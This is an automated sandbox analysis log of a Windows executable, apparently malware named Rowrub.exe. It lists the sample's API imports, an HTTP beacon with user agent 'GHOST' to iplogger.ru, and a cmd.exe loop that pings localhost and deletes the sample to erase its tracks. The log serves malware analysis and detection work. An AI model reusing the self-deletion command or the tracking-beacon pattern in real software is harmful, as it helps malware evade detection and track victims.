| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExA, address_out = 0x75ea5aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadLocale, address_out = 0x75ea5600 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoA, address_out = 0x75ee28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75ea50b0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75ea5070 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoA, address_out = 0x75ea5020 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x75ea4cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x75ea4c40 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileA, address_out = 0x75efedb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75efed70 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x75ea5e20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x74b9f900 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = PeekMessageA, address_out = 0x74b887a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MsgWaitForMultipleObjects, address_out = 0x74b9eca0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x74b9ddc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x74b8fd80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharNextW, address_out = 0x74ba1130 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerBuffW, address_out = 0x74b934a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerBuffA, address_out = 0x74be75b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharToOemA, address_out = 0x74bdf020 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetOpenEnumA, address_out = 0x744dd140 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetEnumResourceA, address_out = 0x744dc6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetCloseEnum, address_out = 0x744d2640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x75eff120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileAttributesW, address_out = 0x75eff100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResumeThread, address_out = 0x75ea6380 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResetEvent, address_out = 0x75efec40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileW, address_out = 0x75ede500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSection, address_out = 0x77c0af20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalUnlock, address_out = 0x75ee44e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalReAlloc, address_out = 0x75ee3f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalHandle, address_out = 0x75ee4420 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalLock, address_out = 0x75ee42f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x75ea1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x75ea5750 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExA, address_out = 0x75ea56d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDefaultLangID, address_out = 0x75ea53d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocalTime, address_out = 0x75ea5060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFullPathNameA, address_out = 0x75efef90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x75ea4ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x75ea4fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x75ea4f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeA, address_out = 0x75efeec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceA, address_out = 0x75efee80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatA, address_out = 0x75ea76e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedExchange, address_out = 0x75ea73e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x75ea4bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75efee40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75efedf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToLocalFileTime, address_out = 0x75efed60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToDosDateTime, address_out = 0x75ee1eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumCalendarInfoA, address_out = 0x75ebc0d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x75efed00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventA, address_out = 0x75efeb00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringA, address_out = 0x75ea4410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x761cffc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExA, address_out = 0x761cf560 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x761c8b30 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteW, address_out = 0x765e42e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayPtrOfIndex, address_out = 0x75bd6670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayGetUBound, address_out = 0x75bd5460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayGetLBound, address_out = 0x75bd5ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayCreate, address_out = 0x75bd0340 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeType, address_out = 0x75bca5e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantCopy, address_out = 0x75be9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantClear, address_out = 0x75be9db0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantInit, address_out = 0x75be9de0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x73fb3a70 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenA, address_out = 0x73f9f1a0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x7407e5b0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x73f8d000 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x7401dd00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestA, address_out = 0x7409dba0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x73ff62f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderLocation, address_out = 0x765e3790 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetPathFromIDListW, address_out = 0x7658bda0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetMalloc, address_out = 0x765edf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x75efee90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75bca610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x75c152c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x75c16560 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75bed610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x75bee3e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x75bedb10 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x75c15800 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x75c161a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x75c16400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75be3200 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x75c16610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x75c167b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x75bd60b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75bd6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x75be3010 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x75be3630 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75bd8b90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75bc2d90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x75bd48f0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75bd7f50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75bd89c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75bd48a0 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 |
System (3275)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1769 milliseconds (1.769 seconds) |
|
7 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
5 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
3243 | |
| Get Time | type = Performance Ctr, time = 18317787063 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385139723 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385146109 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385151368 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385156490 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385161674 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385496343 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385502200 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385507384 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385512486 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18385517598 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Windows Directory, result_out = C:\WINDOWS |
|
2 | |
| Get Info | type = System Directory, result_out = C:\WINDOWS\system32 |
|
1 |
Environment (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = TEMP, result_out = C:\Users\FD1HVy\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = WINDIR, result_out = C:\WINDOWS |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 113 bytes |
| Total Data Received | 584 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 88.99.66.31 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | GHOST |
| Server Name | iplogger.ru |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 113 bytes |
| Data Received | 584 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = iplogger.ru, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = 1CZM57.txt, accept_types = 0, flags = INTERNET_FLAG_IDN_DIRECT, INTERNET_FLAG_IDN_PROXY |
|
1 | |
| Add HTTP Request Headers | headers = Host: iplogger.ru User-Agent: GHOST Referer: B3195CE3-F37D-5752-8AB0-F23AD89717A2 |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = iplogger.ru/1CZM57.txt |
|
1 | |
| Read Response | size = 4097, size_out = 116 |
|
1 | |
| Read Response | size = 4097, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
Process #7: cmd.exe
144
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /c for /l %x in (1,1,666) do ( ping -n 3 127.1 & del "C:\Users\FD1HVy\Desktop\Rowrub.exe" & if not exist "C:\Users\FD1HVy\Desktop\Rowrub.exe" exit ) |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:11, Reason: Child Process |
| Unmonitor | End Time: 00:01:29, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe0 |
| Parent PID | 0xe00 (c:\users\fd1hvy\desktop\rowrub.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
48C
0x
FA4
|
Host Behavior
File (95)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
3 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
16 | |
| Get Info | C:\Users\FD1HVy\Desktop\Rowrub.exe | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
53 | |
| Open | STD_INPUT_HANDLE | - |
|
4 | |
| Open | \??\C:\Users\FD1HVy\Desktop\Rowrub.exe | desired_access = DELETE, open_options = FILE_NON_DIRECTORY_FILE, FILE_DELETE_ON_CLOSE, FILE_OPEN_FOR_BACKUP_INTENT, share_mode = FILE_SHARE_DELETE |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 13 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 43 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\PING.EXE | os_pid = 0x9e8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x370000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = x in (1,1,666) do ( ping -n 3 127.1 & del "C |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #9: ping.exe
56
1
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\ping.exe |
| Command Line | ping -n 3 127.1 |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:29, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e8 |
| Parent PID | 0xe0 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
824
0x
6DC
0x
36C
0x
FC0
|
Host Behavior
File (34)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
17 | |
| Open | STD_OUTPUT_HANDLE | - |
|
17 |
Registry (2)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\ping.exe | base_address = 0x1380000 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
2 |
Environment (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = OutputEncoding |
|
16 |
Network Behavior
ICMP (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Send ICMP Echo | source_address = 0.0.0.0, destination_address = 127.0.0.1, timeout = 4000 |
|
3 |
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Address | address = 127.0.0.1, host_out = 127.0.0.1 |
|
2 | |
| Resolve Name | host = 127.1, address_out = 127.0.0.1 |
|
1 |
